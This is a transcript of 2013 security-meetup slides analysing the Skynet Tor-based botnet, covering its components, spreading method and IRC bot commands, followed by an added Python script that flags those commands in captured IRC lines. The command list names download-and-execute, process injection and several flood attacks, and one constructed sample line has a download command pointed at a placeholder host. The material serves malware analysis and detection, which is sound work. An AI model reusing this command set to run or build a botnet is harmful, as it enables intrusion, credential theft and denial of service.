An inside look at Skynet, a Tor-based botnet

null Hyderabad Chapter - August 2013 Meet

Transcript

  • 1. The content I show here is for educational purposes only. I am not responsible for your actions. The views, ideas and knowledge expressed here are solely my own and have nothing to do with the company or organization in which I currently work.
  • 2. Srinu K
      • Working as a malware analyst at Online Guards
      • Having 2+ years of experience working with malware
      • Seasoned penetration tester and forensic investigator
      • LinkedIn: http://in.linkedin.com/pub/srinu-neo/39/806/712
  • 3. Size: ~15 MB. Skynet is bundled with 4 main components:
      1. Tor client for Windows
      2. Zeus bot
      3. CGMiner
      4. Opencl.dll
  • 4. Spreading: via Usenet downloads. Capabilities:
      1. Tor communication
      2. Credential grabbing
      3. DDoS
      4. IRC
      5. Bitcoin mining
  • 5. Botnet Size: > 12,000 zombies
  • 6. Zeus king of botnets
  • 8. Feature: Commands
      • Get information on the compromised computer: !info, !version, !hardware, !idle
      • Download and execute files: !download
      • Download a binary to memory and inject it into other processes: !download.mem
      • Visit a webpage: !visit, !visit.post
      • SYN and UDP flooding: !syn, !syn.stop, !udp, !udp.stop
      • Slowloris flooding: !slowloris, !slowloris.stop
      • HTTP flooding: !http.bwrape, !http.bwrape.stop
      • Open a SOCKS proxy: !socks
      • Retrieve the .onion address of the Hidden Service opened on the compromised computer: !ip
  • 9. The botnet mines only if the computer has been unused for 2 minutes, and it stops mining immediately when the owner returns. Skynet installs WH_MOUSE and WH_KEYBOARD hook procedures that monitor the system for keystrokes or mouse movements.
  • 10. Another Tor-based botnet is “Atrax”. In the future we are likely to see more botnets adopt Tor as a communication channel.
  • 11. Rapid7
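
An added example, not part of the original slides: a triage script that maps the commands listed on slide 8 to the capability each one drives and flags them in plaintext IRC lines recovered during analysis (for example from a sandbox run). It assumes a command arrives as the first word of a PRIVMSG; the sample lines, nicks and channel are constructed.

```python
import re

# Command names as listed on slide 8, grouped by the capability they drive.
CAPABILITIES = {
    "host info": ["!info", "!version", "!hardware", "!idle"],
    "download and execute": ["!download"],
    "in-memory injection": ["!download.mem"],
    "web visit": ["!visit", "!visit.post"],
    "SYN/UDP flood": ["!syn", "!syn.stop", "!udp", "!udp.stop"],
    "Slowloris flood": ["!slowloris", "!slowloris.stop"],
    "HTTP flood": ["!http.bwrape", "!http.bwrape.stop"],
    "SOCKS proxy": ["!socks"],
    "hidden-service address": ["!ip"],
}
COMMAND_TO_CAPABILITY = {c: cap for cap, cmds in CAPABILITIES.items() for c in cmds}

# IRC line layout: optional ":prefix", the verb, a target, then ":trailing text".
PRIVMSG = re.compile(r"^(?::(?P<prefix>\S+) )?PRIVMSG (?P<target>\S+) :(?P<text>.*)$")

def classify(line):
    """Return (sender, target, command, capability) for one IRC line, else None."""
    m = PRIVMSG.match(line.rstrip("\r\n"))
    if not m:
        return None  # PING, JOIN, numerics and so on carry no message text
    words = m.group("text").split()
    if not words:
        return None
    # Exact match on the first word only: "!download.mem" must not be read as
    # "!download", and "!information" must not be read as "!info".
    capability = COMMAND_TO_CAPABILITY.get(words[0])
    if capability is None:
        return None
    # The prefix is nick!user@host; a plain substring search for "!info" would
    # wrongly fire on a user field such as "op!info@...".
    sender = (m.group("prefix") or "").split("!", 1)[0]
    return sender, m.group("target"), words[0], capability

# Constructed sample lines (not captured traffic).
SAMPLE = [
    "PING :irc.example.invalid",
    ":op!info@host.example.invalid PRIVMSG #chan :hello everyone",
    ":op!u@host.example.invalid PRIVMSG #chan :!download.mem http://example.invalid/a.bin",
    ":op!u@host.example.invalid PRIVMSG #chan :!syn.stop",
    ":op!u@host.example.invalid PRIVMSG #chan :!information please",
]

def scan(lines):
    """Classify every line and keep only the ones that carry a listed command."""
    return [hit for hit in map(classify, lines) if hit]

if __name__ == "__main__":
    for hit in scan(SAMPLE):
        print(hit)
```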
